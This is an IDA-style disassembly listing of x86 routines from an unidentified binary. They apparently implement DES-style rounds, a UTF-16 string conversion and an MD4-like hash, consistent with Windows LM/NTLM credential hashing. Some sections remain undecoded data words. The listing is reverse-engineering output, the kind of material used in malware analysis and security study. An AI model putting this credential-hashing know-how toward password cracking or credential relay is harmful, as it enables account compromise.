push edi
push [ebp+arg_C]
call sub_40F5BF
loc_412979: ; CODE XREF: sub_4128B0+16�j
; sub_4128B0+90�j ...
mov eax, esi
pop ebx
pop edi
pop esi
leave
retn 10h
sub_4128B0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412990 proc near ; CODE XREF: sub_411800+D3�p
var_430 = byte ptr -430h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFBD0h
push esi
push ebx
push edi
push 30h
push 0
lea eax, [ebp+var_430]
push eax
call sub_40F5F0
lea esi, [ebp+var_400]
push 400h
push 0
push esi
call sub_40F5F0
lea edi, [esi+100h]
lea ebx, [edi+10h]
push [ebp+arg_0]
push ebx
call sub_40A25A
push 8
push [ebp+arg_4]
lea eax, [ebp+var_400]
push eax
call sub_40F5BF
lea esi, [edi+90h]
push esi
push ebx
call sub_412A2B
add esp, 8
add esi, 10h
push esi
push ebx
call loc_413191
add esp, 8
lea eax, [ebp+var_430]
push eax
lea eax, [ebp+var_400]
push eax
push edi
call near ptr dword_413020
add esp, 0Ch
add esi, 10h
push 30h
push esi
push [ebp+arg_8]
call sub_40F5BF
pop edi
pop ebx
pop esi
leave
retn 0Ch
sub_412990 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A2B proc near ; CODE XREF: sub_412990+5A�p
var_18 = byte ptr -18h
var_A = byte ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push 0Fh
push 0
lea eax, [ebp+var_18]
push eax
call sub_40F5F0
cmp [ebp+arg_0], 0
jz short loc_412A52
push 0Eh
push [ebp+arg_0]
lea eax, [ebp+var_18]
push eax
call sub_40A260
loc_412A52: ; CODE XREF: sub_412A2B+17�j
mov [ebp+var_A], 0
xor ecx, ecx
mov [ebp+var_4], ecx
jmp short loc_412A7A
; ---------------------------------------------------------------------------
loc_412A5D: ; CODE XREF: sub_412A2B+57�j
mov ecx, [ebp+var_4]
movsx eax, byte ptr [ecx+ebp-18h]
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_414408
mov edx, [ebp+var_4]
mov [edx+ebp-18h], al
inc [ebp+var_4]
loc_412A7A: ; CODE XREF: sub_412A2B+30�j
mov ecx, [ebp+var_4]
cmp byte ptr [ecx+ebp-18h], 0
jnz short loc_412A5D
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_412AA4
add esp, 8
push 0Fh
push 0
lea eax, [ebp+var_18]
push eax
call sub_40F5F0
mov esp, ebp
pop ebp
retn
sub_412A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412AA4 proc near ; CODE XREF: sub_412A2B+60�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov eax, dword_41ACC8
mov [ebp+var_8], eax
mov eax, dword_41ACCC
mov [ebp+var_4], eax
push 1
push [ebp+arg_0]
lea edx, [ebp+var_8]
push edx
push [ebp+arg_4]
call sub_412AEE
add esp, 10h
push 1
mov ecx, [ebp+arg_0]
add ecx, 7
push ecx
lea eax, [ebp+var_8]
push eax
mov edx, [ebp+arg_4]
add edx, 8
push edx
call sub_412AEE
add esp, 10h
pop ecx
pop ecx
pop ebp
retn
sub_412AA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412AEE proc near ; CODE XREF: sub_412AA4+22�p
; sub_412AA4+3E�p
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_4C = byte ptr -4Ch
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFF34h
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
call sub_4140FF
add esp, 8
xor edx, edx
mov [ebp+var_4], edx
loc_412B0B: ; CODE XREF: sub_412AEE+BB�j
mov ecx, [ebp+var_4]
and ecx, 80000007h
jns short loc_412B1B
dec ecx
or ecx, 0FFFFFFF8h
inc ecx
loc_412B1B: ; CODE XREF: sub_412AEE+26�j
push ecx
mov ecx, 7
pop eax
sub ecx, eax
mov edx, 1
shl edx, cl
mov eax, [ebp+var_4]
test eax, eax
jns short loc_412B35
add eax, 7
loc_412B35: ; CODE XREF: sub_412AEE+42�j
sar eax, 3
mov ecx, [ebp+arg_4]
movzx eax, byte ptr [eax+ecx]
and edx, eax
jz short loc_412B47
mov dl, 1
jmp short loc_412B49
; ---------------------------------------------------------------------------
loc_412B47: ; CODE XREF: sub_412AEE+53�j
xor edx, edx
loc_412B49: ; CODE XREF: sub_412AEE+57�j
mov eax, [ebp+var_4]
mov [eax+ebp-8Ch], dl
mov ecx, [ebp+var_4]
and ecx, 80000007h
jns short loc_412B63
dec ecx
or ecx, 0FFFFFFF8h
inc ecx
loc_412B63: ; CODE XREF: sub_412AEE+6E�j
push ecx
mov ecx, 7
pop eax
sub ecx, eax
mov edx, 1
shl edx, cl
mov eax, [ebp+var_4]
test eax, eax
jns short loc_412B7D
add eax, 7
loc_412B7D: ; CODE XREF: sub_412AEE+8A�j
sar eax, 3
xor ecx, ecx
mov cl, [eax+ebp-0Ch]
and edx, ecx
jz short loc_412B8E
mov dl, 1
jmp short loc_412B90
; ---------------------------------------------------------------------------
loc_412B8E: ; CODE XREF: sub_412AEE+9A�j
xor edx, edx
loc_412B90: ; CODE XREF: sub_412AEE+9E�j
mov eax, [ebp+var_4]
mov [eax+ebp-0CCh], dl
mov ecx, [ebp+var_4]
mov byte ptr [ecx+ebp-4Ch], 0
inc [ebp+var_4]
cmp [ebp+var_4], 40h
jl loc_412B0B
push [ebp+arg_C]
lea eax, [ebp+var_CC]
push eax
lea edx, [ebp+var_8C]
push edx
lea ecx, [ebp+var_4C]
push ecx
call sub_412C30
add esp, 10h
xor eax, eax
mov [ebp+var_4], eax
loc_412BD1: ; CODE XREF: sub_412AEE+F4�j
mov edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov byte ptr [edx+ecx], 0
inc [ebp+var_4]
cmp [ebp+var_4], 8
jl short loc_412BD1
xor eax, eax
mov [ebp+var_4], eax
loc_412BE9: ; CODE XREF: sub_412AEE+13C�j
mov edx, [ebp+var_4]
cmp byte ptr [edx+ebp-4Ch], 0
jz short loc_412C23
mov ecx, [ebp+var_4]
and ecx, 80000007h
jns short loc_412C03
dec ecx
or ecx, 0FFFFFFF8h
inc ecx
loc_412C03: ; CODE XREF: sub_412AEE+10E�j
push ecx
mov ecx, 7
pop eax
sub ecx, eax
mov dl, 1
shl dl, cl
mov eax, [ebp+var_4]
test eax, eax
jns short loc_412C1A
add eax, 7
loc_412C1A: ; CODE XREF: sub_412AEE+127�j
sar eax, 3
mov ecx, [ebp+arg_0]
or [eax+ecx], dl
loc_412C23: ; CODE XREF: sub_412AEE+103�j
inc [ebp+var_4]
cmp [ebp+var_4], 40h
jl short loc_412BE9
mov esp, ebp
pop ebp
retn
sub_412AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C30 proc near ; CODE XREF: sub_412AEE+D6�p
var_56C = byte ptr -56Ch
var_54C = byte ptr -54Ch
var_52C = byte ptr -52Ch
var_50C = byte ptr -50Ch
var_50B = byte ptr -50Bh
var_50A = byte ptr -50Ah
var_509 = byte ptr -509h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_4DC = byte ptr -4DCh
var_4AC = byte ptr -4ACh
var_47C = byte ptr -47Ch
var_43C = byte ptr -43Ch
var_41C = byte ptr -41Ch
var_3FC = byte ptr -3FCh
var_3BC = byte ptr -3BCh
var_BC = byte ptr -0BCh
var_84 = byte ptr -84h
var_68 = byte ptr -68h
var_4C = byte ptr -4Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFA94h
push 38h
push offset dword_41A980
push [ebp+arg_8]
lea eax, [ebp+var_4C]
push eax
call loc_412FE6
add esp, 10h
xor edx, edx
mov [ebp+var_4], edx
loc_412C54: ; CODE XREF: sub_412C30+39�j
mov ecx, [ebp+var_4]
mov al, [ecx+ebp-4Ch]
mov edx, [ebp+var_4]
mov [edx+ebp-68h], al
inc [ebp+var_4]
cmp [ebp+var_4], 1Ch
jl short loc_412C54
xor ecx, ecx
mov [ebp+var_4], ecx
loc_412C70: ; CODE XREF: sub_412C30+58�j
mov eax, [ebp+var_4]
mov dl, [eax+ebp-30h]
mov ecx, [ebp+var_4]
mov [ecx+ebp-84h], dl
inc [ebp+var_4]
cmp [ebp+var_4], 1Ch
jl short loc_412C70
xor eax, eax
mov [ebp+var_4], eax
loc_412C8F: ; CODE XREF: sub_412C30+E3�j
push 1Ch
mov edx, [ebp+var_4]
xor ecx, ecx
mov cl, byte_41AAB8[edx]
push ecx
lea eax, [ebp+var_68]
push eax
call near ptr dword_413130
add esp, 0Ch
push 1Ch
mov edx, [ebp+var_4]
xor ecx, ecx
mov cl, byte_41AAB8[edx]
push ecx
lea eax, [ebp+var_84]
push eax
call near ptr dword_413130
add esp, 0Ch
push 1Ch
push 1Ch
lea edx, [ebp+var_84]
push edx
lea ecx, [ebp+var_68]
push ecx
lea eax, [ebp+var_BC]
push eax
call sub_4140AB
add esp, 14h
push 30h
push offset dword_41A9B8
lea edx, [ebp+var_BC]
push edx
mov ecx, [ebp+var_4]
shl ecx, 4
lea ecx, [ecx+ecx*2]
lea eax, [ebp+var_3BC]
add ecx, eax
push ecx
call loc_412FE6
add esp, 10h
inc [ebp+var_4]
cmp [ebp+var_4], 10h
jl loc_412C8F
push 40h
push offset dword_41A9E8
push [ebp+arg_4]
lea edx, [ebp+var_3FC]
push edx
call loc_412FE6
add esp, 10h
xor ecx, ecx
mov [ebp+var_8], ecx
loc_412D37: ; CODE XREF: sub_412C30+136�j
mov eax, [ebp+var_8]
mov dl, [eax+ebp-3FCh]
mov ecx, [ebp+var_8]
mov [ecx+ebp-41Ch], dl
mov eax, [ebp+var_8]
mov dl, [eax+ebp-3DCh]
mov ecx, [ebp+var_8]
mov [ecx+ebp-43Ch], dl
inc [ebp+var_8]
cmp [ebp+var_8], 20h
jl short loc_412D37
xor eax, eax
mov [ebp+var_4], eax
loc_412D6D: ; CODE XREF: sub_412C30+372�j
push 30h
push offset dword_41AA28
lea edx, [ebp+var_43C]
push edx
lea ecx, [ebp+var_4AC]
push ecx
call loc_412FE6
add esp, 10h
push 30h
cmp [ebp+arg_C], 0
jz short loc_412D97
mov eax, [ebp+var_4]
jmp short loc_412D9F
; ---------------------------------------------------------------------------
loc_412D97: ; CODE XREF: sub_412C30+160�j
mov eax, 0Fh
sub eax, [ebp+var_4]
loc_412D9F: ; CODE XREF: sub_412C30+165�j
mov edx, eax
shl edx, 4
lea edx, [edx+edx*2]
lea ecx, [ebp+var_3BC]
add edx, ecx
push edx
lea eax, [ebp+var_4AC]
push eax
lea edx, [ebp+var_4DC]
push edx
call sub_414071
add esp, 10h
xor ecx, ecx
mov [ebp+var_8], ecx
loc_412DCB: ; CODE XREF: sub_412C30+1D6�j
xor eax, eax
mov [ebp+var_C], eax
loc_412DD0: ; CODE XREF: sub_412C30+1CD�j
mov edx, [ebp+var_8]
lea edx, [edx+edx*2]
lea ecx, [ebp+edx*2+var_4DC]
mov eax, [ebp+var_C]
mov dl, [eax+ecx]
mov ecx, [ebp+var_8]
lea ecx, [ecx+ecx*2]
lea eax, [ebp+ecx*2+var_50C]
mov ecx, [ebp+var_C]
mov [ecx+eax], dl
inc [ebp+var_C]
cmp [ebp+var_C], 6
jl short loc_412DD0
inc [ebp+var_8]
cmp [ebp+var_8], 8
jl short loc_412DCB
xor edx, edx
mov [ebp+var_8], edx
loc_412E0D: ; CODE XREF: sub_412C30+2A6�j
mov eax, [ebp+var_8]
lea eax, [eax+eax*2]
movsx edx, [ebp+eax*2+var_50C]
add edx, edx
mov ecx, [ebp+var_8]
lea ecx, [ecx+ecx*2]
movsx eax, [ebp+ecx*2+var_507]
or edx, eax
mov [ebp+var_10], edx
mov edx, [ebp+var_8]
lea edx, [edx+edx*2]
movsx ecx, [ebp+edx*2+var_50B]
shl ecx, 3
mov eax, [ebp+var_8]
lea eax, [eax+eax*2]
movsx edx, [ebp+eax*2+var_50A]
shl edx, 2
or ecx, edx
mov eax, [ebp+var_8]
lea eax, [eax+eax*2]
movsx edx, [ebp+eax*2+var_509]
add edx, edx
or ecx, edx
mov eax, [ebp+var_8]
lea eax, [eax+eax*2]
movsx edx, [ebp+eax*2+var_508]
or ecx, edx
mov [ebp+var_14], ecx
xor ecx, ecx
mov [ebp+var_C], ecx
loc_412E7E: ; CODE XREF: sub_412C30+29D�j
mov ecx, 3
sub ecx, [ebp+var_C]
mov eax, 1
shl eax, cl
mov edx, [ebp+var_10]
shl edx, 4
mov ecx, [ebp+var_8]
shl ecx, 6
add ecx, offset dword_41AAC8
lea edx, [edx+ecx]
mov ecx, [ebp+var_14]
movzx edx, byte ptr [ecx+edx]
and eax, edx
jz short loc_412EB1
mov al, 1
jmp short loc_412EB3
; ---------------------------------------------------------------------------
loc_412EB1: ; CODE XREF: sub_412C30+27B�j
xor eax, eax
loc_412EB3: ; CODE XREF: sub_412C30+27F�j
mov edx, [ebp+var_8]
lea edx, [edx+edx*2]
lea ecx, [ebp+edx*2+var_50C]
mov edx, [ebp+var_C]
mov [edx+ecx], al
inc [ebp+var_C]
cmp [ebp+var_C], 4
jl short loc_412E7E
inc [ebp+var_8]
cmp [ebp+var_8], 8
jl loc_412E0D
xor eax, eax
mov [ebp+var_8], eax
loc_412EE1: ; CODE XREF: sub_412C30+2E9�j
xor ecx, ecx
mov [ebp+var_C], ecx
loc_412EE6: ; CODE XREF: sub_412C30+2E0�j
mov eax, [ebp+var_8]
lea eax, [eax+eax*2]
lea edx, [ebp+eax*2+var_50C]
mov ecx, [ebp+var_C]
mov al, [ecx+edx]
mov edx, [ebp+var_8]
lea ecx, [ebp+edx*4+var_52C]
mov edx, [ebp+var_C]
mov [edx+ecx], al
inc [ebp+var_C]
cmp [ebp+var_C], 4
jl short loc_412EE6
inc [ebp+var_8]
cmp [ebp+var_8], 8
jl short loc_412EE1
push 20h
push offset dword_41AA58
lea eax, [ebp+var_52C]
push eax
lea ecx, [ebp+var_54C]
push ecx
call loc_412FE6
add esp, 10h
push 20h
lea eax, [ebp+var_54C]
push eax
lea edx, [ebp+var_41C]
push edx
lea ecx, [ebp+var_56C]
push ecx
call sub_414071
add esp, 10h
xor eax, eax
mov [ebp+var_8], eax
loc_412F5C: ; CODE XREF: sub_412C30+347�j
mov edx, [ebp+var_8]
mov cl, [edx+ebp-43Ch]
mov eax, [ebp+var_8]
mov [eax+ebp-41Ch], cl
inc [ebp+var_8]
cmp [ebp+var_8], 20h
jl short loc_412F5C
xor edx, edx
mov [ebp+var_8], edx
loc_412F7E: ; CODE XREF: sub_412C30+369�j
mov ecx, [ebp+var_8]
mov al, [ecx+ebp-56Ch]
mov edx, [ebp+var_8]
mov [edx+ebp-43Ch], al
inc [ebp+var_8]
cmp [ebp+var_8], 20h
jl short loc_412F7E
inc [ebp+var_4]
cmp [ebp+var_4], 10h
jl loc_412D6D
push 20h
push 20h
lea ecx, [ebp+var_41C]
push ecx
lea eax, [ebp+var_43C]
push eax
lea edx, [ebp+var_47C]
push edx
call sub_4140AB
add esp, 14h
push 40h
push offset dword_41AA78
lea ecx, [ebp+var_47C]
push ecx
push [ebp+arg_0]
call loc_412FE6
add esp, 10h
mov esp, ebp
pop ebp
retn
sub_412C30 endp
; ---------------------------------------------------------------------------
loc_412FE6: ; CODE XREF: sub_412C30+17�p
; sub_412C30+D4�p ...
push ebp
mov ebp, esp
push ecx
xor eax, eax
mov [ebp-4], eax
mov edx, [ebp-4]
cmp edx, [ebp+14h]
jge short near ptr dword_41301C+1
mov ecx, [ebp+10h]
mov eax, [ebp-4]
xor edx, edx
; ---------------------------------------------------------------------------
db 8Ah
dword_413000 dd 4D8B0814h dd 0A448A0Ch
dword_413008 dd 0FC558BFFh dword_41300C dd 88084D8Bh dword_413010 dd 45FF0A04h dword_413014 dd 0FC458BFCh dword_413018 dd 7C14453Bh dword_41301C dd 0C35D59DAh ; DATA XREF: sub_40A2A2�r
dword_413020 dd 8BEC8B55h ; DATA XREF: sub_40A2C0�r
dword_413024 dd 38830845h dword_413028 dd 8B0D7400h dword_41302C dd 0C9330855h dword_413030 dd 1488A89h dword_413034 dd 0C35D0000h dword_413038 dd 508458Bh dword_41303C dd 0B0h dword_413040 dd 0C75FF50h dd 8108558Bh
dword_413048 dd 90C2h dd 58E85200h
dword_413050 dd 83000000h dword_413054 dd 4D8B0CC4h dword_413058 dd 0C8C18108h dword_41305C dd 51000000h dword_413060 dd 8B0C75FFh dword_413064 dd 0A0050845h dword_413068 dd 50000000h dword_41306C dd 3AE8h dword_413070 dd 0CC48300h dword_413074 dd 0C708558Bh dword_413078 dd 14882h dword_41307C dd 1800h dword_413080 dd 1075FF00h dword_413084 dd 81084D8Bh dword_413088 dd 0C8C1h dword_41308C dd 458B5100h dword_413090 dd 0A00508h dword_413094 dd 0E8500000h dword_413098 dd 104Eh dword_41309C dd 8B0CC483h dword_4130A0 dd 42C70855h dword_4130A4 dd 108h dword_4130A8 dd 55C35D00h dword_4130AC dd 0C483EC8Bh dd 6A156AE8h
dword_4130B4 dd 0E8458D00h dword_4130B8 dd 0C532E850h dword_4130BC dd 106AFFFFh dword_4130C0 dd 8D0875FFh dword_4130C4 dd 0E850E845h dword_4130C8 dd 0FFFFC4F3h dword_4130CC dd 0FF1075FFh dword_4130D0 dd 4D8D0C75h dword_4130D4 dd 7E851E8h dword_4130D8 dd 83000000h dword_4130DC dd 0E58B0CC4h dword_4130E0 dd 8B55C35Dh dword_4130E4 dd 0FF016AECh dword_4130E8 dd 75FF0875h dword_4130EC dd 1075FF0Ch dword_4130F0 dd 0FFF9F9E8h dword_4130F4 dd 10C483FFh dword_4130F8 dd 458B016Ah dword_4130FC dd 7C08308h dword_413100 dd 0C75FF50h dword_413104 dd 8310558Bh dword_413108 dd 0E85208C2h dword_41310C dd 0FFFFF9DEh dword_413110 dd 6A10C483h dword_413114 dd 84D8B01h dword_413118 dd 510EC183h dword_41311C dd 8B0C75FFh dword_413120 dd 0C0831045h dword_413124 dd 0C3E85010h dword_413128 dd 83FFFFF9h dword_41312C dd 0C35D10C4h dword_413130 dd 83EC8B55h ; sub_412C30+8E�p
; DATA XREF: ...
dword_413134 dd 0C033BCC4h dword_413138 dd 8BFC4589h dword_41313C dd 553BFC55h dword_413140 dd 8B227D10h dword_413144 dd 4503FC45h dword_413148 dd 7DF7990Ch dword_41314C dd 84D8B10h dword_413150 dd 8B0A048Ah dd 4488FC55h
dword_413158 dd 45FFBC2Ah dword_41315C dd 0FC4D8BFCh dword_413160 dd 7C104D3Bh dword_413164 dd 89C033DEh dword_413168 dd 558BFC45h dword_41316C dd 10553BFCh dd 4D8B1B7Dh
dword_413174 dd 29448AFCh dd 8558BBCh
dword_41317C dd 88FC4D8Bh dd 45FF1104h
dword_413184 dd 0FC458BFCh dword_413188 dd 7C10453Bh dword_41318C dd 5DE58BE5h db 0C3h
; ---------------------------------------------------------------------------
loc_413191: ; CODE XREF: sub_412990+67�p
push ebp
mov ebp, esp
; ---------------------------------------------------------------------------
dword_413194 dd 0FF7CC481h dword_413198 dd 8268FFFFh dword_41319C dd 6A000000h dword_4131A0 dd 7C858D00h dword_4131A4 dd 50FFFFFFh dword_4131A8 dd 0FFC443E8h dword_4131AC dd 87D83FFh dword_4131B0 dd 68147400h dword_4131B4 dd 81h dword_4131B8 dd 8D0875FFh dword_4131BC dd 0FFFF7C85h dword_4131C0 dd 99E850FFh dword_4131C4 dd 0FFFFFF70h dword_4131C8 dd 8D8D0C75h dword_4131CC dd 0FFFFFF7Ch dword_4131D0 dd 1AE851h dd 0C4830000h, 826808h, 6A0000h, 0FF7C858Dh, 0E850FFFFh
dd 0FFFFC404h, 0C35DE58Bh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
push dword ptr [ebp+8]
call sub_40A266
mov [ebp-4], eax
cmp dword ptr [ebp-4], 80h
jle short loc_413214
mov dword ptr [ebp-4], 80h
loc_413214: ; CODE XREF: rdata:0041320B�j
push dword ptr [ebp-4]
push dword ptr [ebp+8]
lea eax, [ebp-108h]
push eax
call sub_413261
add esp, 0Ch
mov edx, [ebp-4]
mov word ptr [ebp+edx*2-108h], 0
lea ecx, [ebp-108h]
push ecx
call sub_4132B7
pop ecx
add eax, eax
mov [ebp-4], eax
push dword ptr [ebp-4]
lea eax, [ebp-108h]
push eax
push dword ptr [ebp+0Ch]
call sub_4132D8
add esp, 0Ch
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413261 proc near ; CODE XREF: rdata:00413221�p
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
xor eax, eax
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
cmp edx, [ebp+arg_8]
jge short loc_4132B0
loc_413274: ; CODE XREF: sub_413261+4D�j
mov ecx, [ebp+arg_4]
xor eax, eax
mov al, [ecx]
mov [ebp+var_6], ax
mov dl, byte ptr [ebp+var_6]
and dl, 0FFh
mov ecx, [ebp+arg_0]
mov [ecx], dl
movzx eax, [ebp+var_6]
sar eax, 8
mov edx, [ebp+arg_0]
mov [edx+1], al
add [ebp+arg_0], 2
inc [ebp+arg_4]
cmp [ebp+var_6], 0
jz short loc_4132B0
inc [ebp+var_4]
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_8]
jl short loc_413274
loc_4132B0: ; CODE XREF: sub_413261+11�j
; sub_413261+42�j
mov eax, [ebp+var_4]
pop ecx
pop ecx
pop ebp
retn
sub_413261 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4132B7 proc near ; CODE XREF: rdata:0041323D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
xor eax, eax
mov [ebp+var_4], eax
jmp short loc_4132C5
; ---------------------------------------------------------------------------
loc_4132C2: ; CODE XREF: sub_4132B7+19�j
inc [ebp+var_4]
loc_4132C5: ; CODE XREF: sub_4132B7+9�j
mov edx, [ebp+arg_0]
add [ebp+arg_0], 2
cmp word ptr [edx], 0
jnz short loc_4132C2
mov eax, [ebp+var_4]
pop ecx
pop ebp
retn
sub_4132B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4132D8 proc near ; CODE XREF: rdata:00413255�p
; rdata:004140F5�p
var_C8 = byte ptr -0C8h
var_88 = byte ptr -88h
var_50 = byte ptr -50h
var_48 = byte ptr -48h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFF38h
mov eax, [ebp+arg_8]
shl eax, 3
mov [ebp+var_4], eax
mov dword_41ACD8, 67452301h
mov dword_41ACDC, 0EFCDAB89h
mov dword_41ACE0, 98BADCFEh
mov dword_41ACE4, 10325476h
cmp [ebp+arg_8], 40h
jle short loc_413345
loc_413318: ; CODE XREF: sub_4132D8+6B�j
push [ebp+arg_4]
lea edx, [ebp+var_C8]
push edx
call sub_4134E5
add esp, 8
lea ecx, [ebp+var_C8]
push ecx
call loc_41353E
pop ecx
add [ebp+arg_4], 40h
sub [ebp+arg_8], 40h
cmp [ebp+arg_8], 40h
jg short loc_413318
loc_413345: ; CODE XREF: sub_4132D8+3E�j
xor eax, eax
mov [ebp+var_8], eax
loc_41334A: ; CODE XREF: sub_4132D8+87�j
mov edx, [ebp+var_8]
mov byte ptr [edx+ebp-88h], 0
inc [ebp+var_8]
cmp [ebp+var_8], 80h
jl short loc_41334A
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_88]
push eax
call sub_40F5BF
mov eax, [ebp+arg_8]
mov byte ptr [eax+ebp-88h], 80h
cmp [ebp+arg_8], 37h
jg short loc_4133B8
push [ebp+var_4]
lea edx, [ebp+var_50]
push edx
call sub_4134AA
add esp, 8
lea ecx, [ebp+var_88]
push ecx
lea eax, [ebp+var_C8]
push eax
call sub_4134E5
add esp, 8
lea edx, [ebp+var_C8]
push edx
call loc_41353E
pop ecx
jmp short loc_41340A
; ---------------------------------------------------------------------------
loc_4133B8: ; CODE XREF: sub_4132D8+AA�j
push [ebp+var_4]
lea ecx, [ebp+var_10]
push ecx
call sub_4134AA
add esp, 8
lea eax, [ebp+var_88]
push eax
lea edx, [ebp+var_C8]
push edx
call sub_4134E5
add esp, 8
lea ecx, [ebp+var_C8]
push ecx
call loc_41353E
pop ecx
lea eax, [ebp+var_48]
push eax
lea edx, [ebp+var_C8]
push edx
call sub_4134E5
add esp, 8
lea ecx, [ebp+var_C8]
push ecx
call loc_41353E
pop ecx
loc_41340A: ; CODE XREF: sub_4132D8+DE�j
xor eax, eax
mov [ebp+var_8], eax
loc_41340F: ; CODE XREF: sub_4132D8+14C�j
mov edx, [ebp+var_8]
mov byte ptr [edx+ebp-88h], 0
inc [ebp+var_8]
cmp [ebp+var_8], 80h
jl short loc_41340F
lea ecx, [ebp+var_88]
push ecx
lea eax, [ebp+var_C8]
push eax
call sub_4134E5
add esp, 8
push dword_41ACD8
push [ebp+arg_0]
call sub_4134AA
add esp, 8
push dword_41ACDC
mov edx, [ebp+arg_0]
add edx, 4
push edx
call sub_4134AA
add esp, 8
push dword_41ACE0
mov ecx, [ebp+arg_0]
add ecx, 8
push ecx
call sub_4134AA
add esp, 8
push dword_41ACE4
mov eax, [ebp+arg_0]
add eax, 0Ch
push eax
call sub_4134AA
add esp, 8
xor edx, edx
mov dword_41ACE4, edx
mov dword_41ACE0, edx
mov dword_41ACDC, edx
mov dword_41ACD8, edx
mov esp, ebp
pop ebp
retn
sub_4132D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4134AA proc near ; CODE XREF: sub_4132D8+B3�p
; sub_4132D8+E7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov al, byte ptr [ebp+arg_4]
and al, 0FFh
mov edx, [ebp+arg_0]
mov [edx], al
mov ecx, [ebp+arg_4]
shr ecx, 8
and cl, 0FFh
mov eax, [ebp+arg_0]
mov [eax+1], cl
mov edx, [ebp+arg_4]
shr edx, 10h
and dl, 0FFh
mov ecx, [ebp+arg_0]
mov [ecx+2], dl
mov eax, [ebp+arg_4]
shr eax, 18h
and al, 0FFh
mov edx, [ebp+arg_0]
mov [edx+3], al
pop ebp
retn
sub_4134AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4134E5 proc near ; CODE XREF: sub_4132D8+4A�p
; sub_4132D8+C9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
mov [ebp+var_4], eax
loc_4134EE: ; CODE XREF: sub_4134E5+54�j
mov edx, [ebp+var_4]
mov ecx, [ebp+arg_4]
xor eax, eax
mov al, [ecx+edx*4+3]
shl eax, 18h
mov edx, [ebp+var_4]
mov ecx, [ebp+arg_4]
movzx edx, byte ptr [ecx+edx*4+2]
shl edx, 10h
or eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
movzx ecx, byte ptr [edx+ecx*4+1]
shl ecx, 8
or eax, ecx
mov edx, [ebp+var_4]
mov ecx, [ebp+arg_4]
movzx edx, byte ptr [ecx+edx*4]
or eax, edx
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_4]
mov [ecx+edx*4], eax
inc [ebp+var_4]
cmp [ebp+var_4], 10h
jl short loc_4134EE
pop ecx
pop ebp
retn
sub_4134E5 endp
; ---------------------------------------------------------------------------
loc_41353E: ; CODE XREF: sub_4132D8+59�p
; sub_4132D8+D8�p ...
push ebp
mov ebp, esp
add esp, 0FFFFFFACh
xor eax, eax
mov [ebp-4], eax
loc_413549: ; CODE XREF: rdata:00413560�j
mov edx, [ebp+8]
mov ecx, [ebp-4]
mov eax, [edx+ecx*4]
mov edx, [ebp-4]
mov [ebp+edx*4-54h], eax
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 10h
jl short loc_413549
mov ecx, dword_41ACD8
mov [ebp-8], ecx
mov eax, dword_41ACDC
mov [ebp-0Ch], eax
mov edx, dword_41ACE0
mov [ebp-10h], edx
mov ecx, dword_41ACE4
mov [ebp-14h], ecx
push 3
push dword_41ACE4
push dword_41ACE0
push dword_41ACDC
call sub_41405C
add esp, 0Ch
add eax, dword_41ACD8
add eax, [ebp-54h]
push eax
call sub_41401E
add esp, 8
mov dword_41ACD8, eax
push 7
push dword_41ACE0
push dword_41ACDC
push dword_41ACD8
call sub_41405C
add esp, 0Ch
add eax, dword_41ACE4
add eax, [ebp-50h]
push eax
call sub_41401E
add esp, 8
